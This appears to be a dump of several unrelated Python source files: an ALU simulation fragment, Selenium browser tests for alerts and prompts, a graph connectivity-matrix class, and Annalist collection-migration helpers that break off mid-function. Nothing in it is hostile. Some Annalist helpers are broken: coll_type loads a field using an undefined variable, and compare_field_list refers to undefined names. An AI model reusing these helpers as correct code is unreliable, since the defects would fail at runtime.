x | y and nx, ny, no 0001 01011
x ^ y xor 0010 00000
x >> y lsr 0011 00000
x << y lsl 0100 00000
x * y mul 0101 00000
x / y div 0110 00000
'''
# decode
fx = control[ 0 : 4 ]
zx = control[ 4 ]
nx = control[ 5 ]
zy = control[ 6 ]
ny = control[ 7 ]
no = control[ 8 ]
# constants, not, negate, and, or, add, sub
x0 = muxN_( N, zeroN_( N ), x, zx )
x0 = muxN_( N, notN_( N, x0 ), x0, nx )
y0 = muxN_( N, zeroN_( N ), y, zy )
y0 = muxN_( N, notN_( N, y0 ), y0, ny )
z0 = addN_( N, x0, y0 )
z0 = muxN_( N, notN_( N, z0 ), z0, no )
z1 = andN_( N, x0, y0 )
z1 = muxN_( N, notN_( N, z1 ), z1, no )
# xor
z2 = xorN_( N, x, y )
# logical shift
z3 = shiftRightN_( N, x, y )
z4 = shiftLeftN_( N, x, y )
# Select output
out = muxN16to1_(
N,
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
zeroN_( N ),
z4,
z3,
z2,
z1,
z0,
fx[ 0 ], fx[ 1 ], fx[ 2 ], fx[ 3 ]
)
out_zr = mux_( 1, 0, isZeroN_( N, out ) )
out_ng = mux_( 1, 0, isNegative_( out ) )
return ( out, out_zr, out_ng )
|
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pytest
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import ElementNotVisibleException
from selenium.common.exceptions import InvalidElementStateException
from selenium.common.exceptions import NoAlertPresentException
from selenium.common.exceptions import UnexpectedAlertPresentException
import unittest
class AlertsTest(unittest.TestCase):
def testShouldBeAbleToOverrideTheWindowAlertMethod(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.execute_script(
"window.alert = function(msg) { document.getElementById('text').innerHTML = msg; }")
self.driver.find_element(by=By.ID, value="alert").click()
try:
self.assertEqual(self.driver.find_element_by_id('text').text, "cheese")
except Exception as e:
# if we're here, likely the alert is displayed
# not dismissing it will affect other tests
try:
self._waitForAlert().dismiss()
except Exception:
pass
raise e
def testShouldAllowUsersToAcceptAnAlertManually(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
alert.accept()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowUsersToAcceptAnAlertWithNoTextManually(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID,"empty-alert").click();
alert = self._waitForAlert()
alert.accept()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldGetTextOfAlertOpenedInSetTimeout(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element_by_id("slow-alert").click()
# DO NOT WAIT OR SLEEP HERE
# This is a regression test for a bug where only the first switchTo call would throw,
# and only if it happens before the alert actually loads.
alert = self._waitForAlert()
try:
self.assertEqual("Slow", alert.text)
finally:
alert.accept()
@pytest.mark.ignore_chrome
def testShouldAllowUsersToDismissAnAlertManually(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
alert.dismiss()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowAUserToAcceptAPrompt(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="prompt").click()
alert = self._waitForAlert()
alert.accept()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowAUserToDismissAPrompt(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="prompt").click()
alert = self._waitForAlert()
alert.dismiss()
# If we can perform any action, we're good to go
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowAUserToSetTheValueOfAPrompt(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="prompt").click()
alert = self._waitForAlert()
alert.send_keys("cheese")
alert.accept()
result = self.driver.find_element(by=By.ID, value="text").text
self.assertEqual("cheese", result)
def testSettingTheValueOfAnAlertThrows(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID,"alert").click();
alert = self._waitForAlert()
try:
alert.send_keys("cheese");
self.fail("Expected exception");
except ElementNotVisibleException:
pass
except InvalidElementStateException:
pass
finally:
alert.accept()
def testAlertShouldNotAllowAdditionalCommandsIfDimissed(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts");
self.driver.find_element(By.ID, "alert").click()
alert = self._waitForAlert()
alert.dismiss()
try:
alert.text
self.fail("Expected NoAlertPresentException")
except NoAlertPresentException:
pass
def testShouldAllowUsersToAcceptAnAlertInAFrame(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.switch_to.frame("iframeWithAlert")
self.driver.find_element_by_id("alertInFrame").click()
alert = self._waitForAlert()
alert.accept()
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldAllowUsersToAcceptAnAlertInANestedFrame(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.switch_to.frame("iframeWithIframe")
self.driver.switch_to.frame("iframeWithAlert")
self.driver.find_element_by_id("alertInFrame").click()
alert = self._waitForAlert()
alert.accept()
self.assertEqual("Testing Alerts", self.driver.title)
def testShouldThrowAnExceptionIfAnAlertHasNotBeenDealtWithAndDismissTheAlert(self):
pass
# //TODO(David) Complete this test
def testPromptShouldUseDefaultValueIfNoKeysSent(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "prompt-with-default").click()
alert = self._waitForAlert()
alert.accept()
txt = self.driver.find_element(By.ID, "text").text
self.assertEqual("This is a default value", txt)
def testPromptShouldHaveNullValueIfDismissed(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "prompt-with-default").click()
alert = self._waitForAlert()
alert.dismiss()
self.assertEqual("null", self.driver.find_element(By.ID, "text").text)
def testHandlesTwoAlertsFromOneInteraction(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "double-prompt").click()
alert1 = self._waitForAlert()
alert1.send_keys("brie")
alert1.accept()
alert2 = self._waitForAlert()
alert2.send_keys("cheddar")
alert2.accept();
self.assertEqual(self.driver.find_element(By.ID, "text1").text, "brie")
self.assertEqual(self.driver.find_element(By.ID, "text2").text, "cheddar")
def testShouldHandleAlertOnPageLoad(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(By.ID, "open-page-with-onload-alert").click()
alert = self._waitForAlert()
value = alert.text
alert.accept()
self.assertEquals("onload", value)
def testShouldAllowTheUserToGetTheTextOfAnAlert(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
value = alert.text
alert.accept()
self.assertEqual("cheese", value)
def testUnexpectedAlertPresentExceptionContainsAlertText(self):
if self.driver.capabilities['browserName'] == 'phantomjs':
pytest.xfail("phantomjs driver does not support alerts")
self._loadPage("alerts")
self.driver.find_element(by=By.ID, value="alert").click()
alert = self._waitForAlert()
value = alert.text
try:
self._loadPage("simpleTest")
raise Exception("UnexpectedAlertPresentException should have been thrown")
except UnexpectedAlertPresentException as uape:
self.assertEquals(value, uape.alert_text)
self.assertTrue(str(uape).startswith("Alert Text: %s" % value))
def _waitForAlert(self):
return WebDriverWait(self.driver, 3).until(EC.alert_is_present())
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
try:
# just in case a previous test left open an alert
self.driver.switch_to.alert().dismiss()
except:
pass
self.driver.get(self._pageURL(name))
|
|
from . import utils
from .path import *
from .pathFinder import *
import copy
class ConnectivityMatrix:
def __init__(self, graph):
self._graph = graph
self._paths = []
self._nodes = []
self._initialMatrix = []
self._matrix = []
self._rowLabels = []
self._colLabels = []
self._sourcesCollapsed = False
self._targetsCollapsed = False
def _activateMatrix(self, nodes):
self._nodes = list(set(nodes))
for i in range(0, len(self._nodes)):
row = []
for j in range(0, len(self._nodes)):
row.append([])
self._matrix.append(row)
for node in self._nodes:
self._rowLabels.append(utils.getNodeId(node, self._graph))
self._colLabels.append(utils.getNodeId(node, self._graph))
def _addPathToMatrix(self, path):
source = path.nodes[0]
target = path.nodes[len(path.nodes) - 1]
assert source in self._nodes and target in self._nodes, 'Found a path that is not in matrix. WTF?'
self._paths.append(path)
sourceIndex = self._getNodeIndex(source)
targetIndex = self._getNodeIndex(target)
self._matrix[sourceIndex][targetIndex].append(len(self._paths) - 1)
def _getNodeIndex(self, node):
return self._nodes.index(node)
def _getPathAsIndexes(self, path):
pathIndexes = []
for i in range(0, len(path.nodes)):
pathIndexes.append(int(path.nodes[i].id))
if i < len(path.edges):
pathIndexes.append(int(path.edges[i].id))
return pathIndexes
def _getUsedColIndexes(self):
usedColIndexes = []
for i in range(0, len(self._matrix)):
row = self._matrix[i]
for j in range(0, len(row)):
col = row[j]
if len(col) is not 0 and j not in usedColIndexes:
usedColIndexes.append(j)
return usedColIndexes
def _getUsedRowIndexes(self):
usedRowIndexes = []
for i in range(0, len(self._matrix)):
row = self._matrix[i]
for j in range(0, len(row)):
col = row[j]
if len(col) is not 0 and i not in usedRowIndexes:
usedRowIndexes.append(i)
return usedRowIndexes
def activate(self, nodeConstraints, edgeConstraints):
"""
Create a connectivity matrix for the given path node and edge constraints.
_matrix[i][j] holds indexes to paths from _nodes[j] to _nodes[i]
The paths for these indexes can be found in _paths
:param nodeConstraints - regex of all nodes
:param edgeConstraints - regex of all edges
"""
# Matrix is N x N where N is the number of sources and targets.
sources = utils.getNodesByTypeRegex(nodeConstraints[0], self._graph)
targets = utils.getNodesByTypeRegex(nodeConstraints[len(nodeConstraints) - 1], self._graph)
nodes = sources + targets
self._activateMatrix(nodes)
# Find paths for each source. Shove them into the matrix.
for node in sources:
pathFinder = PathFinder(self._graph)
pathFinder.findRegexConstrainedPathsFromSource(node, edgeConstraints, nodeConstraints)
for path in pathFinder.valid:
self._addPathToMatrix(path)
# Cache the initial matrix.
self._initialMatrix = copy.deepcopy(self._matrix)
def collapseSources(self):
"""
Updates _matrix s.t. all rows of the same label get collapsed to a single row.
"""
if self._sourcesCollapsed:
return
sourceTypes = utils.getNodesTypes(self._nodes, self._graph)
newMatrix = []
newCols = []
for node in self._nodes:
newCols.append(utils.getNodeId(node, self._graph))
for sourceType in sourceTypes:
newRow = [[] for node in self._nodes]
for i in range(0, len(self._matrix)):
rowType = utils.getNodeType(self._nodes[i], self._graph)
row = self._matrix[i]
if rowType == sourceType:
for j in range(0, len(row)):
col = row[j]
if len(col) > 0:
newRow[j] += col
newMatrix.append(newRow)
self._matrix = copy.deepcopy(newMatrix)
self._colLabels = newCols
self._rowLabels = sourceTypes
def collapseTargets(self):
"""
Updates _matrix s.t. all cols of the same label get collapsed to a single col.
"""
if self._targetsCollapsed:
return
self._targetsCollapsed = True
targetTypes = utils.getNodesTypes(self._nodes, self._graph)
newMatrix = []
# Initialize newMatrix
for i in range(0, len(self._matrix)):
newRow = []
for j in range(0, len(targetTypes)):
newRow.append([])
newMatrix.append(newRow)
# Populate new matrix
for i in range(0, len(self._matrix)):
row = self._matrix[i]
for j in range(0, len(row)):
col = row[j]
if len(col) > 0:
colType = utils.getNodeType(self._nodes[j], self._graph)
colIndex = targetTypes.index(colType)
newMatrix[i][colIndex] += col
self._matrix = copy.deepcopy(newMatrix)
self._colLabels = targetTypes
def getAsJsonObject(self, removeEmptyGridCells=False, replaceCellIdsWithIndexes=False):
newMatrix = []
rowLabels = []
colLabels = []
if replaceCellIdsWithIndexes and (self._targetsCollapsed or self._sourcesCollapsed):
assert False, "Cannot replace ids with indexes if sources or targets are collapsed"
if removeEmptyGridCells:
usedRows = self._getUsedRowIndexes()
usedCols = self._getUsedColIndexes()
newMatrix = []
for i in range(0, len(usedRows)):
row = []
for j in range(0, len(usedCols)):
row.append([])
newMatrix.append(row)
for i in range(0, len(self._matrix)):
if i in usedRows:
newRowIndex = usedRows.index(i)
row = self._matrix[i]
for j in range(0, len(row)):
if j in usedCols:
newColIndex = usedCols.index(j)
col = row[j]
pathList = []
for k in range(0, len(col)):
pathList.append(self._getPathAsIndexes(self._paths[col[k]]))
newMatrix[newRowIndex][newColIndex] = pathList
for rowIndex in usedRows:
rowLabels.append(self._rowLabels[rowIndex])
for colIndex in usedCols:
colLabels.append(self._colLabels[colIndex])
else:
for row in self._matrix:
newRow = []
for col in row:
pathList = []
for k in range(0, len(col)):
pathList.append(self._getPathAsIndexes(self._paths[col[k]]))
newRow.append(pathList)
newMatrix.append(newRow)
rowLabels = self._rowLabels
colLabels = self._colLabels
if replaceCellIdsWithIndexes:
newRowLabels = []
for label in rowLabels:
newRowLabels.append(int(utils.getNodeById(int(label), self._graph).id))
rowLabels = newRowLabels
newColLabels = []
for label in colLabels:
newColLabels.append(int(utils.getNodeById(int(label), self._graph).id))
colLabels = newColLabels
jsonObject = {}
jsonObject['row_labels'] = rowLabels
jsonObject['col_labels'] = colLabels
jsonObject['matrix'] = newMatrix
return jsonObject
def getPathAt(self, index):
return self._paths[index]
def reset(self):
self._matrix = copy.deepcopy(self._initialMatrix)
self._rowLabels = []
self._colLabels = []
for node in self._nodes:
self._rowLabels.append(utils.getNodeId(node, self._graph))
self._colLabels.append(utils.getNodeId(node, self._graph))
self._targetsCollapsed = False
self._sourcesCollapsed = False
|
|
"""
Collection management and migration helpers
See also: documents/notes/schema-evolution-notes:
"""
from __future__ import unicode_literals
from __future__ import absolute_import, division, print_function
__author__ = "Graham Klyne ([email protected])"
__copyright__ = "Copyright 2016, G. Klyne"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
import os
import sys
import logging
import subprocess
import importlib
import shutil
import datetime
log = logging.getLogger(__name__)
from annalist import layout
from annalist.identifiers import ANNAL, RDFS
from annalist.util import valid_id, extract_entity_id, make_type_entity_id
from annalist.collections_data import installable_collections
from annalist.models.site import Site
from annalist.models.collection import Collection
from annalist.models.recordtype import RecordType
from annalist.models.recordview import RecordView
from annalist.models.recordlist import RecordList
from annalist.models.recordfield import RecordField
from annalist.models.recordgroup import RecordGroup
from annalist.models.collectiondata import initialize_coll_data, copy_coll_data, migrate_coll_data
from . import am_errors
from .am_settings import (
am_get_settings, am_get_site_settings, am_get_site
)
from .am_getargvalue import getarg, getargvalue
# Collection access helpers
def get_settings_site(annroot, userhome, options):
"""
Get settings and site data based on command line options provided
returns:
(status, settings, site)
where 'settings' and/or 'site' are None if not found.
"""
status = am_errors.AM_SUCCESS
settings = am_get_settings(annroot, userhome, options)
site = None
if not settings:
print("Settings not found (%s)"%(options.configuration), file=sys.stderr)
status = am_errors.AM_NOSETTINGS
if status == am_errors.AM_SUCCESS:
sitesettings = am_get_site_settings(annroot, userhome, options)
if not sitesettings:
print("Site settings not found (%s)"%(options.configuration), file=sys.stderr)
status = am_errors.AM_NOSETTINGS
if status == am_errors.AM_SUCCESS:
site = am_get_site(sitesettings)
return (status, settings, site)
def coll_type(coll, type_id):
"""
Return identified type in collection, or None
"""
return RecordField.load(coll, field_id, altscope="all")
def coll_types(coll):
"""
Return iterator over types in collection
"""
return coll.types()
def coll_view(coll, view_id):
"""
Return identified view in collection, or None
"""
return RecordView.load(coll, view_id, altscope="all")
def coll_views(coll):
"""
Return iterator over views in collection
"""
for fid in coll._children(RecordView, altscope="all"):
f = coll_view(coll, fid)
if f and f.get_id() != "_initial_values":
yield f
return
def coll_list(coll, list_id):
"""
Return identified list in collection, or None
"""
return RecordList.load(coll, list_id, altscope="all")
def coll_lists(coll):
"""
Return iterator over lists in collection
"""
for fid in coll._children(RecordList, altscope="all"):
f = coll_list(coll, fid)
if f and f.get_id() != "_initial_values":
yield f
return
def coll_field(coll, field_id):
"""
Return identified field in collection, or None
"""
return RecordField.load(coll, field_id, altscope="all")
def coll_fields(coll):
"""
Return iterator over fields in collection
"""
for fid in coll._children(RecordField, altscope="all"):
f = coll_field(coll, fid)
if f and f.get_id() != "_initial_values":
yield f
return
def coll_group(coll, group_id):
"""
Return identified group in collection, or None
"""
return RecordGroup.load(coll, group_id, altscope="all")
def coll_groups(coll):
"""
Return iterator over groups in collection
"""
for gid in coll._children(RecordGroup, altscope="all"):
g = coll_group(coll, gid)
if g and g.get_id() != "_initial_values":
yield g
return
# Common logic for View, List and Group field lists
def add_to_set(value, values):
"""
Add non-empty value to set of values
"""
if value:
values.add(value)
return values
def field_in_field_list(field_list, field_id, property_uri):
"""
Tests to see if field is referenced in field list
"""
for fref in field_list:
if ( (extract_entity_id(fref.get(ANNAL.CURIE.field_id, "")) == field_id) or
(fref.get(ANNAL.CURIE.property_uri, "") == property_uri) ):
return True
return False
def group_in_field_list(field_list, coll, group_ids):
"""
Tests to see if any of group ids are referenced in field list
"""
for fref in field_list:
fid = extract_entity_id(fref.get(ANNAL.CURIE.field_id, ""))
fdef = coll_field(coll, fid)
if fdef.get(ANNAL.CURIE.group_ref, "") in group_ids:
return True
return False
def types_using_field(coll, field_id, property_uri):
"""
Returns a list of type ids that may use a specified field or property URI
"""
type_ids = set()
type_uris = set()
group_ids = set()
# Look at field definition
f = coll_field(coll, field_id)
add_to_set(f.get(ANNAL.CURIE.field_entity_type, ""), type_uris)
# Look at groups that reference field
for g in coll_groups(coll):
if field_in_field_list(g[ANNAL.CURIE.group_fields], field_id, property_uri):
add_to_set(g.get_id(), group_ids)
add_to_set(extract_entity_id(g.get(ANNAL.CURIE.record_type, "")), type_uris)
# Look at views that reference field or groups
for v in coll_views(coll):
if ( field_in_field_list(v[ANNAL.CURIE.view_fields], field_id, property_uri) or
group_in_field_list(v[ANNAL.CURIE.view_fields], coll, group_ids) ):
add_to_set(extract_entity_id(v.get(ANNAL.CURIE.record_type, "")), type_uris)
# Look at lists that reference field or groups
for l in coll_lists(coll):
if ( field_in_field_list(l[ANNAL.CURIE.list_fields], field_id, property_uri) or
group_in_field_list(l[ANNAL.CURIE.list_fields], coll, group_ids) ):
add_to_set(extract_entity_id(l.get(ANNAL.CURIE.record_type, "")), type_uris)
add_to_set(extract_entity_id(l.get(ANNAL.CURIE.default_type, "")), type_uris)
# Collect type ids
for t in coll_types(coll):
type_uri = t.get(ANNAL.CURIE.uri, "")
supertype_uris = set( s[ANNAL.CURIE.supertype_uri] for s in t.get(ANNAL.CURIE.supertype_uris,[]) )
if (type_uri in type_uris) or (supertype_uris & type_uris):
add_to_set(t.get_id(), type_ids)
return type_ids
def compare_field_list(old_coll, new_coll, old_field_list, new_field_list, reporting_prefix):
"""
Report URI changes between fields lists as seen in group, view and list definitions
"""
old_len = len(old_field_list)
new_len = len(new_field_list)
if new_len != old_len:
print("* %s, field count changed from %d to %d"%(reporting_prefix, old_len, new_len))
for i in range(new_len):
for j in range(old_len):
# Look for field in old group.
# If not found, ignore it - we're looking for URI changes
# @@TODO: ... or are we?
new_f = new_field_list[i]
old_f = old_field_list[j]
field_id = extract_entity_id(new_f[ANNAL.CURIE.field_id])
if field_id == extract_entity_id(old_f[ANNAL.CURIE.field_id]):
# Field found - check for incompatible URI override
# Note that field definitions are already checked
old_uri = old_f.get(ANNAL.CURIE.property_uri, "")
new_uri = new_f.get(ANNAL.CURIE.property_uri, "")
if (not old_uri) and new_uri:
old_field = coll_field(old_coll, field_id)
old_uri = old_field[ANNAL.CURIE.property_uri]
if old_uri and (not new_uri):
new_field = coll_field(new_coll, field_id)
new_uri = new_field[ANNAL.CURIE.property_uri]
if old_uri != new_uri:
print(
"* %s, field %s, property URI changed from '%s' to '%s'"%
(reporting_prefix, field_id, old_uri, new_uri)
)
print(
" Consider adding supertype '%s' to type '%s' in collection '%s'"%
(old_uri, type_id, new_coll_id)
)
report_property_references(new_coll, old_uri, "URI '%s'"%(old_uri))
break
return
def report_property_references(coll, property_uri, reporting_prefix):
"""
Report all references to a specified property URI.
"""
# Reference from types
for t in coll_types(coll):
type_id = t.get_id()
alias_value_uris = [ a[ANNAL.CURIE.alias_source] for a in t.get(ANNAL.CURIE.field_aliases,[]) ]
if property_uri in alias_value_uris:
print("%s appears as an alias value of type '%s'"%(reporting_prefix, type_id))
# References from views
for v in coll_views(coll):
view_id = v.get_id()
report_property_references_in_field_list(
coll, property_uri, v[ANNAL.CURIE.view_fields],
reporting_prefix, "fields for view %s"%(view_id)
)
# References from lists
for l in coll_lists(coll):
list_id = l.get_id()
if property_uri in l.get(ANNAL.CURIE.list_entity_selector, ""):
print("%s appears in selector for list '%s'"%(reporting_prefix, list_id))
report_property_references_in_field_list(
coll, property_uri, v[ANNAL.CURIE.list_fields],
reporting_prefix, "fields for list %s"%(list_id)
)
# References from fields
for f in coll_fields(coll):
field_id = f.get_id()
if property_uri == f.get(ANNAL.CURIE.property_uri, ""):
print("%s appears as property URI for field '%s'"%(reporting_prefix, field_id))
if property_uri in f.get(ANNAL.CURIE.field_ref_restriction, ""):
print("%s appears in value restriction for field '%s'"%(reporting_prefix, field_id))
# References from groups
for g in coll_groups(coll):
group_id = g.get_id()
report_property_references_in_field_list(
coll, property_uri, g[ANNAL.CURIE.group_fields],
reporting_prefix, "fields for group %s"%(group_id)
)
return
def report_property_references_in_field_list(
coll, property_uri, field_list,
reporting_prefix, reporting_suffix):
"""
Report occurrences of a property URI appearing in a field list.
"""
for f in field_list:
if property_uri == f.get(ANNAL.CURIE.property_uri, ""):
print("%s appears in %s"%(reporting_prefix, reporting_suffix))
return
def report_type_references(coll, type_uri, reporting_prefix):
"""
Report all references to a specified type URI.
"""
# Reference from types
for t in coll_types(coll):
type_id = t.get_id()
supertype_uris = [ u[ANNAL.CURIE.supertype_uri] for u in t.get(ANNAL.CURIE.supertype_uris,[]) ]
if type_uri in supertype_uris:
print("%s appears as a supertype of type '%s'"%(reporting_prefix, type_id))
# References from views
for v in coll_views(coll):
view_id = v.get_id()
if type_uri == v.get(ANNAL.CURIE.record_type, ""):
print("%s appears as entity type for view '%s'"%(reporting_prefix, view_id))
# References from lists
for l in coll_lists(coll):
list_id = l.get_id()
if type_uri == l.get(ANNAL.CURIE.record_type, ""):
print("%s appears as entity type for list '%s'"%(reporting_prefix, list_id))
if type_uri in l.get(ANNAL.CURIE.list_entity_selector, ""):
print("%s appears in selector for list '%s'"%(reporting_prefix, list_id))
# References from fields
for f in coll_fields(coll):
field_id = f.get_id()
if type_uri == f.get(ANNAL.CURIE.field_value_type, ""):
print("%s appears as value type for field '%s'"%(reporting_prefix, field_id))
if type_uri == f.get(ANNAL.CURIE.field_entity_type, ""):
print("%s appears as entity type for field '%s'"%(reporting_prefix, field_id))
if type_uri in f.get(ANNAL.CURIE.field_ref_restriction, ""):
print("%s appears in value restriction for field '%s'"%(reporting_prefix, field_id))
# References from groups
for g in coll_groups(coll):
group_id = g.get_id()
if type_uri == g.get(ANNAL.CURIE.record_type, ""):
print("%s appears as entity type for group %s"%(reporting_prefix, group_id))
return
# Migration helper functions
def am_migrationreport(annroot, userhome, options):
"""
Collection migration report helper
annalist_manager migrationreport old_coll new_coll
Generates a report of changes to data needed to match type and property
URI changes moving from old_coll to new_coll.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
if len(options.args) > 2:
print("Unexpected arguments for %s: (%s)"%(options.command, " ".join(options.args)), file=sys.stderr)
return am_errors.AM_UNEXPECTEDARGS
old_coll_id = getargvalue(getarg(options.args, 0), "Old collection Id: ")
old_coll = Collection.load(site, old_coll_id)
if not (old_coll and old_coll.get_values()):
print("Old collection not found: %s"%(old_coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
new_coll_id = getargvalue(getarg(options.args, 1), "New collection Id: ")
new_coll = Collection.load(site, new_coll_id)
if not (new_coll and new_coll.get_values()):
print("New collection not found: %s"%(new_coll_id), file=sys.stderr)
return am_errors.AM_NOCOLLECTION
status = am_errors.AM_SUCCESS
print("# Migration report from collection '%s' to '%s' #"%(old_coll_id, new_coll_id))
print("")
# Scan and report on type URI changes
for new_type in coll_types(new_coll):
type_id = new_type.get_id()
old_type = old_coll.get_type(type_id)
if old_type:
old_uri = old_type[ANNAL.CURIE.uri]
new_uri = new_type[ANNAL.CURIE.uri]
if old_uri != new_uri:
print("* Type %s, URI changed from '%s' to '%s'"%(type_id, old_uri, new_uri))
supertype_uris = [ u[ANNAL.CURIE.supertype_uri] for u in new_type.get(ANNAL.CURIE.supertype_uris,[]) ]
if old_uri not in supertype_uris:
print(
" Consider adding supertype '%s' to type '%s' in collection '%s'"%
(old_uri, type_id, new_coll_id)
)
report_type_references(new_coll, old_uri, " URI '%s'"%(old_uri))
# Scan and report on property URI changes in field definitions
for new_field in coll_fields(new_coll):
field_id = new_field.get_id()
old_field = coll_field(old_coll, field_id)
if old_field:
old_uri = old_field[ANNAL.CURIE.property_uri]
new_uri = new_field[ANNAL.CURIE.property_uri]
if old_uri != new_uri:
print("* Field %s, property URI changed from '%s' to '%s'"%(field_id, old_uri, new_uri))
type_ids = types_using_field(new_coll, field_id, old_uri)
for tid in type_ids:
print(
" Consider adding property alias for '%s' to type %s in collection '%s'"%
(old_uri, tid, new_coll_id)
)
# Scan and report on property URI changes in group definitions
for new_group in coll_groups(new_coll):
group_id = new_group.get_id()
old_group = coll_group(old_coll, group_id)
if old_group:
compare_field_list(
old_coll, new_coll,
old_group[ANNAL.CURIE.group_fields],
new_group[ANNAL.CURIE.group_fields],
"Group %s"%group_id)
# Scan and report on property URI changes in view definitions
for new_view in coll_views(new_coll):
view_id = new_view.get_id()
old_view = coll_view(old_coll, view_id)
if old_view:
compare_field_list(
old_coll, new_coll,
old_view[ANNAL.CURIE.view_fields],
new_view[ANNAL.CURIE.view_fields],
"View %s"%view_id)
# Scan and report on property URI changes in list definitions
for new_list in coll_lists(new_coll):
list_id = new_list.get_id()
old_list = coll_list(old_coll, list_id)
if old_list:
compare_field_list(
old_coll, new_coll,
old_list[ANNAL.CURIE.list_fields],
new_list[ANNAL.CURIE.list_fields],
"List %s"%list_id)
print("")
return status
# Collection management functions
def am_installcollection(annroot, userhome, options):
"""
Install software-defined collection data
annalist_manager installcollection coll_id
Copies data from an existing collection to a new collection.
annroot is the root directory for the Annalist software installation.
userhome is the home directory for the host system user issuing the command.
options contains options parsed from the command line.
returns 0 if all is well, or a non-zero status code.
This value is intended to be used as an exit status code
for the calling program.
"""
status, settings, site = get_settings_site(annroot, userhome, options)
if status != am_errors.AM_SUCCESS:
return status
if len(options.args) > 1:
print(
"Unexpected arguments for %s: (%s)"%
(options.command, " ".join(options.args)),
file=sys.stderr
)
return am_errors.AM_UNEXPECTEDARGS
# Check collection Id
coll_id = getargvalue(getarg(options.args, 0), "Collection Id to install: ")
if coll_id in installable_collections:
src_dir_name = installable_collections[coll_id]['data_dir']
else:
print("Collection name to install not known: %s"%(coll_id), file=sys.stderr)
print("Available collection Ids are: %s"%(",".join(installable_collections.keys())))
return am_errors.AM_NOCOLLECTION
# Check if ciollection already exists
coll = Collection.load(site, coll_id)
if (coll and coll.get_values()):
if options.force:
print("Existing collection %s will be removed ('--force' specified)"%(coll_id), file=sys.stderr)
Collection.remove(site, coll_id)
else:
print("Collection already exists: %s"%(coll_id), file=sys.stderr)
return am_errors.AM_COLLECTIONEXISTS
# Install collection now
src_dir = os.path.join(annroot, "annalist/data", src_dir_name)
print("Installing collection '%s' from data directory '%s'"%(coll_id, src_dir))
coll_metadata = installable_collections[coll_id]['coll_meta']
date_time_now = datetime.datetime.now().replace(microsecond=0)
coll_metadata[ANNAL.CURIE.comment] = (
"Initialized at %s by `annalist-manager installcollection`"%
date_time_now.isoformat()
)
